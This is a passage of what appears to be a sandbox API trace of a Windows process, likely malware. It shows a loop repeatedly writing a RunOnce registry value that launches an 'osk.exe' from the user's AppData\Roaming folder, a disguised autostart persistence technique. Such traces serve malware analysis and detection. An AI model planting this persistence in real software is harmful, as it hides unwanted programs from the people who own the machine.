hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.718] RegCloseKey (hKey=0x280) returned 0x0 [0095.718] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.718] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.718] SetTimer (hWnd=0x20280, nIDEvent=0x226b, uElapse=0xa, lpTimerFunc=0x0) returned 0x226b [0095.718] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.727] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.727] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.727] KillTimer (hWnd=0x20280, uIDEvent=0x226b) returned 1 [0095.728] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.728] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.728] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.728] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.729] RegCloseKey (hKey=0x280) returned 0x0 [0095.729] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.729] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.729] SetTimer (hWnd=0x20280, nIDEvent=0x226c, uElapse=0xa, lpTimerFunc=0x0) returned 0x226c [0095.729] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.743] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.743] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.743] KillTimer (hWnd=0x20280, uIDEvent=0x226c) returned 1 [0095.743] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.744] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.744] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.744] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.744] RegCloseKey (hKey=0x280) returned 0x0 [0095.744] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.745] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.745] SetTimer (hWnd=0x20280, nIDEvent=0x226d, uElapse=0xa, lpTimerFunc=0x0) returned 0x226d [0095.745] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.758] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.758] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.759] KillTimer (hWnd=0x20280, uIDEvent=0x226d) returned 1 [0095.759] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.759] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.759] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.760] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.760] RegCloseKey (hKey=0x280) returned 0x0 [0095.760] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.760] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.760] SetTimer (hWnd=0x20280, nIDEvent=0x226e, uElapse=0xa, lpTimerFunc=0x0) returned 0x226e [0095.760] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.774] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.774] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.774] KillTimer (hWnd=0x20280, uIDEvent=0x226e) returned 1 [0095.774] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.775] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.775] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.775] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.775] RegCloseKey (hKey=0x280) returned 0x0 [0095.775] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.775] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.775] SetTimer (hWnd=0x20280, nIDEvent=0x226f, uElapse=0xa, lpTimerFunc=0x0) returned 0x226f [0095.775] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.790] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.790] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.790] KillTimer (hWnd=0x20280, 
uIDEvent=0x226f) returned 1 [0095.790] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.791] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.791] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.791] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.791] RegCloseKey (hKey=0x280) returned 0x0 [0095.791] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.792] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.792] SetTimer (hWnd=0x20280, nIDEvent=0x2270, uElapse=0xa, lpTimerFunc=0x0) returned 0x2270 [0095.792] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.805] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.805] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.805] KillTimer (hWnd=0x20280, uIDEvent=0x2270) returned 1 [0095.806] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.806] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.806] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.806] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.807] RegCloseKey (hKey=0x280) returned 0x0 [0095.807] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.807] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.807] SetTimer (hWnd=0x20280, nIDEvent=0x2271, uElapse=0xa, lpTimerFunc=0x0) returned 0x2271 [0095.807] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.821] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.821] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.821] KillTimer (hWnd=0x20280, uIDEvent=0x2271) returned 1 [0095.821] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.822] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.822] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.822] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.822] RegCloseKey (hKey=0x280) returned 0x0 [0095.822] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.822] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.822] SetTimer (hWnd=0x20280, nIDEvent=0x2272, uElapse=0xa, lpTimerFunc=0x0) returned 0x2272 [0095.823] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.839] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.839] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.840] KillTimer (hWnd=0x20280, uIDEvent=0x2272) returned 1 [0095.840] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0095.840] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.840] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.841] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.841] RegCloseKey (hKey=0x280) returned 0x0 [0095.841] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.841] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.841] SetTimer (hWnd=0x20280, nIDEvent=0x2273, uElapse=0xa, lpTimerFunc=0x0) returned 0x2273 [0095.841] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.852] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.852] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.853] KillTimer (hWnd=0x20280, uIDEvent=0x2273) returned 1 [0095.853] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.853] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.853] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.854] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.854] RegCloseKey (hKey=0x280) returned 0x0 
[0095.854] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.854] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.854] SetTimer (hWnd=0x20280, nIDEvent=0x2274, uElapse=0xa, lpTimerFunc=0x0) returned 0x2274 [0095.854] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.868] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.868] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.868] KillTimer (hWnd=0x20280, uIDEvent=0x2274) returned 1 [0095.868] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.869] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.869] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.869] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.869] RegCloseKey (hKey=0x280) returned 0x0 [0095.869] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.869] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.869] SetTimer (hWnd=0x20280, nIDEvent=0x2275, uElapse=0xa, lpTimerFunc=0x0) returned 0x2275 [0095.869] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.884] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.884] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.884] KillTimer (hWnd=0x20280, uIDEvent=0x2275) returned 1 [0095.885] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.885] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.885] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.885] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.885] RegCloseKey (hKey=0x280) returned 0x0 [0095.886] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.886] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.886] SetTimer (hWnd=0x20280, nIDEvent=0x2276, uElapse=0xa, lpTimerFunc=0x0) returned 0x2276 [0095.886] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.899] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.899] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.899] KillTimer (hWnd=0x20280, uIDEvent=0x2276) returned 1 [0095.899] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.899] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.900] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.900] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.900] RegCloseKey (hKey=0x280) returned 0x0 [0095.900] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.900] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.900] SetTimer (hWnd=0x20280, nIDEvent=0x2277, uElapse=0xa, lpTimerFunc=0x0) returned 0x2277 [0095.900] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.915] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.915] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.915] KillTimer (hWnd=0x20280, uIDEvent=0x2277) returned 1 [0095.915] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.916] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.916] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.916] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.916] RegCloseKey (hKey=0x280) returned 0x0 [0095.916] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.916] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.916] SetTimer (hWnd=0x20280, nIDEvent=0x2278, uElapse=0xa, lpTimerFunc=0x0) returned 0x2278 [0095.916] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.930] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.930] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.930] KillTimer (hWnd=0x20280, uIDEvent=0x2278) returned 1 [0095.930] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.931] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.931] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.931] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.931] RegCloseKey (hKey=0x280) returned 0x0 [0095.931] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.931] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.931] SetTimer (hWnd=0x20280, nIDEvent=0x2279, uElapse=0xa, lpTimerFunc=0x0) returned 0x2279 [0095.931] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.945] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.945] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.946] KillTimer (hWnd=0x20280, uIDEvent=0x2279) returned 1 [0095.946] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.946] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.947] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.947] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.947] RegCloseKey (hKey=0x280) returned 0x0 [0095.947] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.947] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0095.947] SetTimer (hWnd=0x20280, nIDEvent=0x227a, uElapse=0xa, lpTimerFunc=0x0) returned 0x227a [0095.947] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.962] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.962] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.962] KillTimer (hWnd=0x20280, uIDEvent=0x227a) returned 1 [0095.962] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.963] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.963] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.963] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.963] RegCloseKey (hKey=0x280) returned 0x0 [0095.963] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.963] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.963] SetTimer (hWnd=0x20280, nIDEvent=0x227b, uElapse=0xa, lpTimerFunc=0x0) returned 0x227b [0095.963] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.977] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.977] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.977] KillTimer (hWnd=0x20280, uIDEvent=0x227b) returned 1 [0095.977] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.978] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.978] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.978] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.978] RegCloseKey (hKey=0x280) returned 0x0 [0095.978] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.978] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.978] SetTimer (hWnd=0x20280, nIDEvent=0x227c, uElapse=0xa, lpTimerFunc=0x0) returned 0x227c [0095.978] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.993] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.993] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.993] KillTimer (hWnd=0x20280, uIDEvent=0x227c) returned 1 [0095.993] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.994] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.994] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.994] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.994] RegCloseKey (hKey=0x280) returned 0x0 [0095.994] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.994] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.994] SetTimer (hWnd=0x20280, nIDEvent=0x227d, uElapse=0xa, lpTimerFunc=0x0) returned 0x227d 
